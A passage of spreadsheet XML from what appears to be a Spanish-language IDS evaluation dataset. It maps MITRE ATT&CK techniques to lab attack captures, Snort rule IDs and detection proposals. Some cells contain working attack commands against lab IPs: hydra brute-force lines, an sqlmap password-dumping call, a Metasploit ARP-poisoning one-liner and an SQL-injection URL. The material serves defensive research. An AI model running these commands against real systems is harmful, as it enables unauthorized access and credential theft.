    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 17429, 1826, 1852, 1877, 2000560, 2002749, 2002752, 2008330, 2009749, 2009885, 2010229, 2010377, 2010706, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100884, 2100937, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101288, 2101489, 2101662, 2101852, 2101877, 33608, 41742, 42289, 43285, 43290, 50447, 59258, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte el envío de una contraseña sobre el cuerpo de una petición HTTP POST. </t>
  </si>
  <si>
    <t>Ataque de fuerza bruta a formulario de acceso a página web phpMyAdmin. Comando: hydra -l root -P /usr/share/john/password.lst 192.168.2.2 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&amp;pma_password=^PASS^:#1045 Cannot log in to the MySQL server"</t>
  </si>
  <si>
    <t>Manual [2] / 3.1.2.1</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Creación de cuentas de redes sociales</t>
  </si>
  <si>
    <t>Sitios web convencionales (Facebook, Github, Microsoft ...)</t>
  </si>
  <si>
    <t>T1585.001-Establish_social_accounts_[4].pcapng</t>
  </si>
  <si>
    <t>Siempre y cuando el origen sea la red a proteger, detección por anomalías que identifique un incipiente aumento de las peticiones a servidores de redes sociales.</t>
  </si>
  <si>
    <t>Manual [4] /  3.2</t>
  </si>
  <si>
    <t>Manual [4] / B.2</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>Envenenamiento de Caché DNS</t>
  </si>
  <si>
    <t>ettercap</t>
  </si>
  <si>
    <t>T1584-Cache_dns_[1].pcapng</t>
  </si>
  <si>
    <t>2100469, 2100384, 2002752, 2002749</t>
  </si>
  <si>
    <t>Una vez el servidor DNS se encuentra comprometido, no es posible determinar si las redirecciones basadas en una caché envenenada son maliciosas o no</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.1.1.5</t>
  </si>
  <si>
    <t>Manual [1] / E.16</t>
  </si>
  <si>
    <t>NO (no detectable por red)</t>
  </si>
  <si>
    <t>Secuestro / Redireccionamiento DNS</t>
  </si>
  <si>
    <t>T1584-Secuestro_dns_[1].pcapng</t>
  </si>
  <si>
    <t>2100384,2100469,2002752,2002749</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.1.1.4</t>
  </si>
  <si>
    <t>Manual [1] / E.15</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t xml:space="preserve">Uso de Botnet </t>
  </si>
  <si>
    <t>Ares, Screenshot and key logging</t>
  </si>
  <si>
    <t>T1584.005-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2049, 29456, 31136, 384, 385, 42340, 449, 566</t>
  </si>
  <si>
    <t xml:space="preserve">1413, 1417, 1448, 1917, 2001219, 2001972, 2003068, 2008578, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2049, 2100566, 2101413, 29456, 31136, 384, 385, 42340, 449, 566
</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2001219, 2001972, 2003068, 2008578, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2049, 2100566, 2101413, 23493, 28993, 29456, 31136, 384, 385, 4060, 42340, 44484, 44485, 44486, 44487, 44488, 44489, 449, 45941, 566</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2001117, 2001219, 2001972, 2002749, 2002752, 2003068, 2008578, 2009205, 2009206, 2009207, 2009208, 2009582, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2023997, 2044666, 2049, 2100254, 2100384, 2100385, 2100449, 2100469, 2100486, 2100566, 2100615, 2100628, 2101413, 2101417, 2101917, 2102049, 23493, 28993, 29456, 31136, 384, 385, 4060, 42340, 44484, 44485, 44486, 44487, 44488, 44489, 449, 45941, 566</t>
  </si>
  <si>
    <t>La detección debe centrarse en otras fases del ciclo de vida de un ataque, como Phishing, DDoS...</t>
  </si>
  <si>
    <t>Uso de Ares y screenshots y key logging    https://www.unb.ca/cic/datasets/ids-2018.html</t>
  </si>
  <si>
    <t>Dataset CIC-2018</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>Acceso a red VPN desde dispositivo no autorizado con credenciales robadas</t>
  </si>
  <si>
    <t>OpenVPN</t>
  </si>
  <si>
    <t>T1133-External_remote_services_[4].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611, 2101620, 2100527, 2002749, 2001117, 2101917</t>
    </r>
  </si>
  <si>
    <t>2101917, 2002749, 2100527, 2101620, 2001117</t>
  </si>
  <si>
    <t>NO***</t>
  </si>
  <si>
    <t xml:space="preserve">Existen varias variantes.
        Circunstancias concretas del ataque: el atacante realiza alguna interacción posterior una vez ha logrado acceder a la red (aplicable a esta técnica) como un escaneo de red o mensajes de anuncio de Host.
        Reglas personalizadas: regla que compruebe si las direcciones IP involucradas en los paquetes se corresponden con las autorizadas dentro de la red VPN (debe ser configurada manualmente).
</t>
  </si>
  <si>
    <t>Acceso a red VPN, sin interacciones adicionales más allá de las naturales al propio acceso</t>
  </si>
  <si>
    <t>Manual [4] /  3.3</t>
  </si>
  <si>
    <t>Manual [4] / B.3</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Inyección SQL</t>
  </si>
  <si>
    <t>Sqlmap</t>
  </si>
  <si>
    <t>T1190-Sql_inyection1_[3].pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,50447</t>
  </si>
  <si>
    <t>Regla que detecte un posible intento al esquema de informacion de un servidor MySQL. Regla que detecte una sentencia SQL pudiendose tratar de una posible inyeccion SQL. Regla que detecte posible escaneo de vulnerabilidades de inyeccion SQL.</t>
  </si>
  <si>
    <t>Ejecucion de comando mediante sqlmap para probar diferentes SQL Injections a una página web. Comando: sqlmap -u http://192.168.2.2/payroll_app.php --forms --batch --passwords</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.5</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.5.4</t>
  </si>
  <si>
    <t>T1190-Sql_inyection2_[2].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2017808,2009815,2009714,2006446,2006445</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2008538,1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2017808,2009815,2009714,2006446,2006445,2008538,1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,19779</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,31939,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>7070</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2012885</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101061,2017808,2009815,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009714</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2006446,2006445,2008538,1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147,19779,50447,31939,7070</t>
    </r>
  </si>
  <si>
    <t>Manual [2] /  3.1.3.1</t>
  </si>
  <si>
    <t>Manual [4] / B.28</t>
  </si>
  <si>
    <t>Damn Vulnerable Web App (DVWA)</t>
  </si>
  <si>
    <t>T1190-Sql_injection-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>NO*</t>
  </si>
  <si>
    <t>Regla personalizada que detecte posibles cadenas asociadas a un ataque de inyección SQL en sentencias HTML</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>HTML Exploit I - HTML Compilador</t>
  </si>
  <si>
    <t>Apache, Shadyantra</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v1_[4].pcapng</t>
  </si>
  <si>
    <t>NO**</t>
  </si>
  <si>
    <t>La detección de esta técnica será más o menos viable dependiendo del objetivo y método del atacante. Si el foco está fijado en la obtención de credenciales, si el ataque está elaborado resulta prácticamente imposible su detección. En caso de que se busque un acceso a la red de manera directa mediante ejecutables y/o malware, el tipo de contenido marcará su grado de detección.</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para compilar código malware (no ejecutar)</t>
  </si>
  <si>
    <t>Manual [4] /  3.4</t>
  </si>
  <si>
    <t>Manual [4] / B.4</t>
  </si>
  <si>
    <t>HTML Exploit II - Descarga de Ejecutable</t>
  </si>
  <si>
    <t>T1189-Drive_by_compromise_v2_[4].pcapng</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para descargar malware en formato ejecutable .exe</t>
  </si>
  <si>
    <t>Manual [4] /B.4</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Añadir hardware</t>
  </si>
  <si>
    <t>SSH Server + USB(Simular USB con MV con SO)</t>
  </si>
  <si>
    <t>T1200-Hardware_Additions_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique desviaciones en el tráfico de red, tales como metadatos o protocolos de gestión (DHCP,...) fuera de los habituales</t>
  </si>
  <si>
    <t>Aparición de una nueva MV en el entorno de la víctima simulando la insercion de un USB tipo Pwn Plug que se utiliza como nodo de acceso a la red de la víctima para posteriormente, aprovechando que el puerto de la víctima esta abierto, acceder al equipo.</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.2.1</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Envío de emails con documentos maliciosos</t>
  </si>
  <si>
    <t>T1566.001-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>1292,46983,47398</t>
  </si>
  <si>
    <t>1292,2002749,2002752,2101292,46983,47398</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con archivos adjuntos maliciosos</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Obtener un acceso inicial mediante ingeniería social utilizando un enlace adjunto en un correo que descargue un fichero que establezca una sesión al equipo víctima</t>
  </si>
  <si>
    <t>SEToolKit, Metasploit</t>
  </si>
  <si>
    <t>T1566.002.pcapng</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con enlaces maliciosos que contengan contenido malware</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.2.2</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Content Injection</t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Realizar una suplantación de identidad DHCP, saturando el servidor DHCP verdadero para que el servidor DHCP del atacante procese las consultas de un usuario. Posteriormente se manipula alguna consulta inyectando contenido malicioso</t>
  </si>
  <si>
    <t>dhcpstarv, Metasploit</t>
  </si>
  <si>
    <t>T1659-Content_Injection_[5].pcapng</t>
  </si>
  <si>
    <t>2100527,2002752,2002749</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100527</t>
  </si>
  <si>
    <t>La detección de esta técnica será más o menos viales dependiendo del objetivo y método del atacante. Si el ataque se realiza en conjunto con protocolos de gestion(DHCP) dificultará la detección. Resultará necesario monitorizar por la distribución a traves del tráfico de red de archivos malware</t>
  </si>
  <si>
    <t>Suplantacion de identidad de DHCP Server para posteriormente inyectar contenido en la víctima con malware</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.2.3</t>
  </si>
  <si>
    <t>Inyección</t>
  </si>
  <si>
    <t>Suite aircrack-ng</t>
  </si>
  <si>
    <t>T1659_Inyeccion_[1].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías, paquetes sospechosos de haber sido generados aleatoriamente y sin correlación con las comunicaciones establecidas. </t>
  </si>
  <si>
    <t>Manual [1] /  2.5.1.1.4</t>
  </si>
  <si>
    <t>Manual [1] / E.23</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Uso de una conexión RDP sin proteger para el acceso a un equipo</t>
  </si>
  <si>
    <t>RDP</t>
  </si>
  <si>
    <t>T1199-Trusted_relationship_[4].pcapng</t>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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FF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034857</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101448, 2101447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001329</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2001330, 2009207, 2009206, 2009205, 2009208, 2002752, 2002749, 1448</t>
    </r>
  </si>
  <si>
    <t>2002752, 2009205, 2009206, 2009207, 2009208, 2002749</t>
  </si>
  <si>
    <t>SI*</t>
  </si>
  <si>
    <t xml:space="preserve">El ataque tiene un matiz clave. Si bien el ataque puede ser detectado por Snort (existen muchas variantes, aunque para esta instancia concreta, por ejemplo, sí que existe mecanismo de detección), el hecho de que se trate de un ataque procedente de un dominio de confianza infectado, dificulta su detección, pues bloquear estos paquetes podría imposibilitar comunicación con el dominio de confianza si no existiera amenaza </t>
  </si>
  <si>
    <t>Manual [4] /  3.5</t>
  </si>
  <si>
    <t>Manual [4] / B.5</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Instalación de Plugin en Navegador Chrome que reenvía información relacionada con búsquedas del usuario a un servidor</t>
  </si>
  <si>
    <t>Manual [4]</t>
  </si>
  <si>
    <t>T1176-Browser-extension_[4].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, 2101917, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101620</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101620, 2002749, 2101917</t>
  </si>
  <si>
    <t>Detección por anomalías basada en flujos de datos hacia direcciones no relacionadas con las búsquedas, normalmente en formato de objetos JavaScript</t>
  </si>
  <si>
    <t>Manual [4] /  3.7</t>
  </si>
  <si>
    <t>Manual [4] / B.7</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>Establecimiento de tarea BITS en equipo Windows para garantizar persistencia trás reinicio del equipo</t>
  </si>
  <si>
    <t>BITSADMIN,METASPLOIT</t>
  </si>
  <si>
    <t>T1197.pcapng</t>
  </si>
  <si>
    <t>Se pueden monitorizar conexiones nuevas generadas por BITS</t>
  </si>
  <si>
    <t>Ejecución de comandos para la creación de una tarea BITS con rastro de red</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.3.1</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t xml:space="preserve">Modificación de imagen de SO mediante la suplantación de un Server TFTP </t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>T1542.005.pcapng</t>
  </si>
  <si>
    <t>1444,2008120,2008119,2008118</t>
  </si>
  <si>
    <t>1444,2100527,2101444,2008120,2002752,2002749,2008119,2008118</t>
  </si>
  <si>
    <t>2002752, 2101444, 2100527, 2008120, 2002749</t>
  </si>
  <si>
    <t>**Regla personalizada que comprueba si la IP del servidor TFTP es la del servidor legítimo ** Que el SO enviado por el atacante contenga algun tipo de malware detectable por un IDS</t>
  </si>
  <si>
    <t>Servidor TFTP utilizando Iventoy</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.3.2</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>None (SQL injection using URL)</t>
  </si>
  <si>
    <t>T1505.001.pcapng</t>
  </si>
  <si>
    <t>2011039, 2006444</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>13513</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438,2011039,2006444</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2100472,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2011039,2006444,13513</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438</t>
    </r>
  </si>
  <si>
    <t>2002752, 2100472, 2002749</t>
  </si>
  <si>
    <t>**Regla genérica que detecte en la petición "%27" que indica la representacion de comillas simples</t>
  </si>
  <si>
    <t>Ejecución de URL en navegador web (http://172.16.2.2:8080/contacto?apellidos=Fernandez%27;%20INSERT%20INTO%20contactos%20values%20(3,%20%27Atacante%27,%20%27Atacante%27,%20%27Atacante%27,%20100)--)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.7</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.7.4</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Shell Web</t>
  </si>
  <si>
    <t>Metasploit</t>
  </si>
  <si>
    <t>T1503.005.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50202</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2006408,50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182,50202</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecta el intento de escaneo para comprobar la existencia de backdoor. </t>
  </si>
  <si>
    <t>El ataque busca aprovechar configuracion vulnerable de un servidor WampServer que permite subir y borrar contenido web mediante el uso de HTTP PUT y HTTP DELETE.
Se realiza la subida de un payload a un servidor web</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.5.1</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Obtención de contraseña por fuerza bruta (adivinación)</t>
  </si>
  <si>
    <t>T1110.001.pcapng</t>
  </si>
  <si>
    <t>Obtener la contraseña para conectarse por SSH al equipo victima mediante fuerza bruta. Comando:  hydra -l dit -P pass.txt 172.16.2.2 -t 4 ssh</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.9</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.9.4</t>
  </si>
  <si>
    <t>FTP - Patator</t>
  </si>
  <si>
    <t>T1110.001-FTP-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>2002749, 2002752</t>
  </si>
  <si>
    <t>SSH - Patator</t>
  </si>
  <si>
    <t>T1110.001-SSH-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>650, 2003068, 2001219</t>
  </si>
  <si>
    <t>650,19559, 17317, 2003068, 2001219</t>
  </si>
  <si>
    <t>650, 2003068, 2001219, 19559, 17317, 2002749, 2002752, 2036752, 2100650</t>
  </si>
  <si>
    <t>Ataque sobre WPS</t>
  </si>
  <si>
    <t>wash, reaver</t>
  </si>
  <si>
    <t>T1110-Wps_[1].pcapng</t>
  </si>
  <si>
    <t>--</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.8</t>
  </si>
  <si>
    <t>Manual [1] / E.27</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Ataque de fuerza bruta basado en diccionario de contraseñas</t>
  </si>
  <si>
    <t>wifite</t>
  </si>
  <si>
    <t>T1110-Diccionario_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.7</t>
  </si>
  <si>
    <t>Manual [1] / E.26</t>
  </si>
  <si>
    <t>NO (Ataque de L2)</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Ataque PMKID</t>
  </si>
  <si>
    <t>hashcat, hcxpcapngtool, hcxdumptool</t>
  </si>
  <si>
    <t>T1110-pmkid_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.6.3</t>
  </si>
  <si>
    <t>Manual [1] / E.25</t>
  </si>
  <si>
    <t>PTW/KoreK/FMS</t>
  </si>
  <si>
    <t>T1110-Ptw_korek_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.5</t>
  </si>
  <si>
    <t>Manual [1] / E.24</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Falsa autenticación</t>
  </si>
  <si>
    <t>T1040-Autenticacion_[1].pcapng</t>
  </si>
  <si>
    <t>No existe detección posible ante este tipo de ataques. El uso de cifrado WEP incorpora vulnerabilidades intrínsecas a este.</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.1</t>
  </si>
  <si>
    <t>Manual [1] / E.20</t>
  </si>
  <si>
    <t>Credential Acess</t>
  </si>
  <si>
    <t>ChopChop</t>
  </si>
  <si>
    <t>T1040-Chopchop_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.2</t>
  </si>
  <si>
    <t>Manual [1] / E.21</t>
  </si>
  <si>
    <t>Fragmentación</t>
  </si>
  <si>
    <t>T1040-Fragmentacion_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.3</t>
  </si>
  <si>
    <t>Manual [1] / E.22</t>
  </si>
  <si>
    <t>Inundación MAC</t>
  </si>
  <si>
    <t>T1040-Mac_flood_[1].pcapng</t>
  </si>
  <si>
    <t>2013028, 50447</t>
  </si>
  <si>
    <t>50447, 2002749, 2100528, 2002752, 2013028, 2002824</t>
  </si>
  <si>
    <t>Regla personalizada que detecte un envío masivo de mensajes IPv4 con direcciones incorreladas con la red a proteger, y que aparenten ser completamente aleatorias</t>
  </si>
  <si>
    <t>Manual [1] /  3.2</t>
  </si>
  <si>
    <t>Manual [1] / E.1</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>Envenenamiento ARP</t>
  </si>
  <si>
    <t>Arpspoof</t>
  </si>
  <si>
    <t>T1557.002-ARP_poisoning1_[2].pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,2100472</t>
  </si>
  <si>
    <t>2002752, 2002749,2100472</t>
  </si>
  <si>
    <t>Envenenamiento de tablas ARP mediante Arpspoof.</t>
  </si>
  <si>
    <t>Manual [2] /  3.4.1.1</t>
  </si>
  <si>
    <t>T1557.002-ARP_poisoning2_[3].pcapng</t>
  </si>
  <si>
    <t>Se realiza un ataque MITM, mediante el envenanamiento de las tablas de ARP caché de un equipo y su gateway. De esta toda se redirige todo el tráfico para que pase a través del equipo del atacante. Comando: msfconsole -x "use auxiliary/spoof/arp/arp_poisoning; set BIDIRECTIONAL true; set interface eth1; set DHOSTS 192.168.1.2; set SHOSTS 192.168.1.1; run -j -z; sleep 5; kill 0; exit"</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.19</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.19</t>
  </si>
  <si>
    <t>Suplantación ARP</t>
  </si>
  <si>
    <t>arpspoof</t>
  </si>
  <si>
    <t>T1557-Arp_spoof_[1].pcapng</t>
  </si>
  <si>
    <t>2100469, 2100384, 2002752, 2002749, 2100366, 2100408</t>
  </si>
  <si>
    <t>2100384,2002752,2100366,2100469,2100408,2002749</t>
  </si>
  <si>
    <t>Mediante el uso de preprocesadores, la detección de este ataque es posible estableciendo un asociación entre la IP a proteger y su dirección MAC correspondiente. De esta forma, se puede fundar una regla que detecte mensajes ARP que incumplen esta asociación y que avistan de un posible ataque por suplantación MAC</t>
  </si>
  <si>
    <t>Manual [1] / E.3</t>
  </si>
  <si>
